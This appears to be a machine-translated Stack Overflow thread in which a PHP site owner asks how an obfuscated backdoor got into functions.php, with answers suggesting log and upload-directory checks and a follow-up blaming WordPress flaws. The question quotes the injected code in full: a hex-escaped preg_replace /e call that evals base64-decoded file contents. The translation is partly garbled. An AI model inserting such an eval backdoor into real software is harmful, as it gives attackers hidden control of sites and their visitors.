0

一些我如何设法在我帮助维护的网站上以非常具体的方式受到攻击,我正在调查服务器是否被直接黑客攻击或有人能够以某种方式注入恶意脚本。

首先有人设法得到这个:

@preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");

在文件注释之后进入 PHP 文件的最顶部。这和其他代码最相似的作用是 301 将未通过浏览器连接到该网站的任何人重定向到发薪日贷款网站。这只影响了我的主页,所有其他页面都很好。

可能有更多代码要做,但这是最令人困惑的部分,因为此代码位于一个名为的文件中,该文件functions.php仅包含在内,但它是 index.php(我的主页)中包含的第一个文件。

让我完全困惑的是,有人如何在不直接入侵服务器的情况下获得代码,那里没有使用用户输入,它实际上位于整个文件之上。除了这个注入的代码和上面的一些注释之外,什么都没有。

我的信封是:

琴图

PHP 5.2.14-pl0-gentoo

阿帕奇 2

我检查了服务器日志,但是,像往常一样,他们删除了他们的踪迹。

正如您所注意到的,这也部分是服务器问题,但 atm 它是 90% 的编程问题,所以我想我会先在这里问它。

PHP 中是否存在任何可能导致此问题的漏洞?

如果您需要澄清,请告诉我。

编辑

我有一个分期系统,它有一个

  • 工作
  • 预习
  • 居住

我知道这与 SQL 注入无关,因为如果我切换实时和预览文件夹,我不会遇到任何问题。我也不将 gentoo 密码存储在数据库或应用程序中,您只能连接到小范围 IP 地址中的服务器,除了 Apache,它接受来自任何主机的 80 和 443 连接。另外,我在站点中使用 SQL 转义类和方法(PDO、MySQLi 等)。

所以这个问题(更令人困惑)只位于我网站的一个副本中,而不是数据库或任何东西。

4

3 回答 3

2

我猜想在服务器管理员方面查明这类事情更多。检查攻击者修改文件的日期,并在服务器日志(可能是 apache 日志、FTP 日志、ssh 日志)中查找该日期和时间的可疑活动。这也可能取决于您的流量、日志大小和对服务器的访问级别,因为这可能会令人望而却步。如果您有任何上传文件的 html 表单,请验证为php shells存储文件的目录。还要检查该目录的权限。如果您在共享主机上,这也可能是攻击者在另一个站点上注入 shell,然后通过这种方式攻击您的结果。在这种情况下,请联系您的托管公司。

于 2012-09-14T17:48:46.900 回答
1

网络服务器故障的可能性为 99%,SQL 注入是一回事,但我不知道,也许他们设法通过 SQL 注入以某种方式获取您的密码,然后登录到控制面板或 ftp,但是,我会说这是网络服务器。

于 2012-09-14T17:26:06.363 回答
0

好的,所以我现在明白如何以及为什么了。这是我认为永远不会发生的一件事:Wordpress。

我基本上是以下受害者: http: //muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html

使用类似的工具:http ://www.youtube.com/watch?v=y-Z5-uHvONc

您会看到,即使我的主站点不是由 wordpress 制作的,并且它有一个 wordpress 博客位于:/blog/黑客能够使用各种 Wordpress 漏洞来解决位置问题并在服务器的任何部分植入脚本。

顺便说一句,这实际上发生在最新安装的 Wordpress 上。仔细检查了版本。我们不完全确定他何时放置脚本(这些年来放置了多个外国脚本实例!)但我们知道最近的攻击肯定也是最近发生的,它放置了最新版本(或版本之前)在大量的审查下。

所以对那里的Wordpress有一个很好的注意事项......

于 2012-09-16T11:01:42.613 回答